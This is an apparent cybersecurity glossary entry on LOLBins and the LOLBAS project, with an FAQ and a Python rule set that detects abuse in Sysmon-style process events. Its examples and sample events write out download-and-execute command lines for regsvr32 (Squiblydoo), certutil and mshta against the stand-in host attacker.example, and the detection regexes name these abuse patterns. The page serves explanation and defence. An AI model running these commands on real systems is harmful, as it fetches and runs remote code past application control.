LOLBin / LOLBAS
What is LOLBin / LOLBAS?
A signed, native binary or script (LOLBin/LOLBAS) that attackers misuse for execution, download, persistence, or defence bypass while appearing to be a legitimate admin tool.
LOLBin (Living-Off-the-Land Binary) is the general term; LOLBAS (Living-Off-the-Land Binaries And Scripts) is the community project that catalogues Microsoft-signed binaries, scripts, and libraries whose side effects are useful to an attacker, such as executing arbitrary code, downloading remote payloads, proxying execution through a trusted process, or bypassing application control. Common examples include rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe, and certutil.exe. Because each tool is signed by Microsoft and ships with Windows or the .NET Framework, defenders cannot simply blocklist it by hash without breaking legitimate use; they must baseline expected command lines and parent processes and alert on abnormal ones. LOLBins underpin many MITRE ATT&CK execution and defence-evasion techniques, most visibly System Binary Proxy Execution (T1218). Mitigations rely on application control allow-listing (WDAC or AppLocker), process-creation logging that captures the full command line (Sysmon Event ID 1, or Security Event 4688 with command-line auditing enabled), PowerShell Script Block logging, Microsoft Defender Attack Surface Reduction (ASR) rules, and EDR behavioural analytics.
● Examples
- 01
regsvr32.exe /s /n /u /i:http://attacker.example/sct.sct scrobj.dll (Squiblydoo): the /i: argument is handed to scrobj.dll's DllInstall, which fetches the remote COM scriptlet (.sct) and executes it; /s suppresses dialogs, and /n /u keep the call from registering anything, so nothing new is written to disk or the registry.
- 02
msbuild.exe payload.xml compiles and runs C# embedded in an MSBuild project file as an inline task, so the payload is built and executed in memory and no separate executable is dropped on disk.
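Detection of the abuses listed above, as an added example that is not part of the original page: a small Python rule set run over constructed process-creation events shaped like Sysmon Event ID 1 records (Image, ParentImage, CommandLine, Hashes). The rules approximate the publicly documented abuse patterns for the binaries named in the definition; the regexes, the suspicious-parent list, the sample events and the placeholder hash value are this example's own assumptions, not the LOLBAS project's detection content.

```python
"""Command-line based LOLBin detection over process-creation events.

Added example, not from the original page. Events are constructed to look
like Sysmon Event ID 1 / Security 4688 data; rules approximate documented
LOLBAS abuse patterns and every threshold here is this example's own choice.
"""
import re
from typing import Dict, List, NamedTuple, Tuple


class Rule(NamedTuple):
    name: str
    image: str                        # basename of the LOLBin (lower-case)
    cmdline: "re.Pattern[str]"        # abuse indicator in the command line


# Script hosts and Office applications have no routine reason to launch
# registration, build or certificate tools; treat them as suspicious parents
# for every rule regardless of the command line. (Assumed list.)
SCRIPT_AND_OFFICE_PARENTS = (
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "wscript.exe", "cscript.exe", "mshta.exe",
)

RULES: List[Rule] = [
    # Squiblydoo: /i:<url or .sct> with scrobj.dll fetches and runs a scriptlet.
    Rule("regsvr32_remote_scriptlet", "regsvr32.exe",
         re.compile(r"/i:\S*(https?://|\.sct\b)|\bscrobj\.dll\b", re.I)),
    # mshta running a remote HTA or an inline javascript:/vbscript: payload.
    Rule("mshta_remote_or_inline", "mshta.exe",
         re.compile(r"https?://|\b(javascript|vbscript):", re.I)),
    # rundll32 given an inline script protocol instead of a DLL export.
    Rule("rundll32_inline_script", "rundll32.exe",
         re.compile(r"\b(javascript|vbscript):", re.I)),
    # msbuild handed a loose .xml project (inline-task trick) rather than
    # a .csproj/.sln from a build tree.
    Rule("msbuild_inline_task_project", "msbuild.exe",
         re.compile(r"\S+\.xml\b", re.I)),
    # certutil used as a downloader or base64 decoder rather than for certs.
    Rule("certutil_download_or_decode", "certutil.exe",
         re.compile(r"-urlcache|-decode\b|-encode\b", re.I)),
    # installutil /U runs the Uninstall() method of an arbitrary assembly.
    Rule("installutil_uninstall_trick", "installutil.exe",
         re.compile(r"(^|\s)/u(\s|$)", re.I)),
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules that fire on one process-creation event."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    for rule in RULES:
        if image != rule.image:
            continue
        if rule.cmdline.search(cmd) or parent in SCRIPT_AND_OFFICE_PARENTS:
            hits.append(rule.name)
    return hits


def scan(events) -> List[Tuple[str, str]]:
    """(rule name, command line) for every event that triggers a rule."""
    return [(name, ev["CommandLine"]) for ev in events for name in evaluate(ev)]


# Constructed sample events. The benign and malicious regsvr32 rows carry the
# same (placeholder) hash: the binary is identical, only the arguments differ,
# which is why blocklisting the image hash cannot catch this.
PLACEHOLDER_HASH = "SHA256=<constructed placeholder, identical on both rows>"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"',
     "Hashes": PLACEHOLDER_HASH},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://attacker.example/sct.sct scrobj.dll",
     "Hashes": PLACEHOLDER_HASH},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\Common7\IDE\devenv.exe",
     "CommandLine": "MSBuild.exe App.csproj /t:Build"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "msbuild.exe payload.xml"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "certutil.exe -hashfile installer.exe SHA256"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://attacker.example/a.txt a.txt"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://attacker.example/x.hta"},
]


if __name__ == "__main__":
    for name, cmd in scan(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

The image-plus-command-line pairing is what makes this work: a rule keyed on regsvr32.exe alone would page on every MSI install, and a rule keyed on "http://" alone would miss the local .sct variant. Parent-process context is the second axis; an Office application spawning msbuild.exe is worth a look even before the arguments are parsed. In production the regexes would be tuned against a baseline of the environment's own command lines, and the events would come from Sysmon or 4688 rather than a list in the script.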
● Frequently asked questions
What is LOLBin / LOLBAS?
A signed, native binary or script (LOLBin/LOLBAS) that attackers misuse for execution, download, persistence, or bypass while looking like a legitimate admin tool. It belongs to the Attacks & Threats category of cybersecurity.
What does LOLBin / LOLBAS mean?
A signed, native binary or script (LOLBin/LOLBAS) that attackers misuse for execution, download, persistence, or bypass while looking like a legitimate admin tool.
How does LOLBin / LOLBAS work?
A LOLBin is a Microsoft-signed binary or script that already exists on the host (rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe, certutil.exe) and has a documented side effect an attacker can drive from the command line: regsvr32 and mshta will fetch and run a remote scriptlet or HTA, msbuild compiles and runs C# embedded in a project file, certutil downloads files and decodes base64. Because the binary is signed and trusted, application control and antivirus treat the process as legitimate; the malicious content lives in the arguments, in a remote resource, or in memory rather than in a new executable on disk, so hash-based blocking does not apply. Detection therefore depends on logging full command lines and parent-child process relationships and comparing them with expected administrative use.
How do you defend against LOLBin / LOLBAS?
Defences combine prevention and detection: application control allow-listing (WDAC or AppLocker) that blocks or constrains binaries such as regsvr32.exe and mshta.exe for users who never need them; Microsoft Defender Attack Surface Reduction (ASR) rules that stop Office applications and scripts from launching child processes; process-creation logging with full command lines (Sysmon Event ID 1 or Security Event 4688) and PowerShell Script Block logging, so that abnormal arguments such as a URL passed to regsvr32 or certutil are visible; and EDR behavioural analytics that correlate the signed binary with its parent process, arguments, and network activity rather than its hash.
What are other names for LOLBin / LOLBAS?
Common alternative names include: LOLBAS, Living-off-the-Land Binary.
● Related terms
- attacks№ 616
Living off the Land
An attacker tradecraft style that abuses legitimate, pre-installed tools and scripts on a victim system instead of dropping custom malware.
- malware№ 417
Fileless Malware
Malware that runs primarily in memory and leverages trusted system tools, avoiding the use of traditional executable files on disk.
- defense-ops№ 298
Defense Evasion
The MITRE ATT&CK tactic (TA0005) covering techniques attackers use to avoid detection, disable security tools, and hide their activity on a target system.
- defense-ops№ 371
EDR (Endpoint Detection and Response)
An endpoint security technology that continuously records process, file, registry and network activity to detect, investigate and respond to threats on hosts.
- defense-ops№ 682
Mimikatz
An open-source Windows post-exploitation tool that extracts plaintext passwords, hashes, Kerberos tickets, and other credentials from memory and LSASS.
- attacks№ 045
AMSI Bypass
Techniques that disable, patch, or evade the Windows Antimalware Scan Interface so that scripts and in-memory payloads are not inspected by antivirus engines.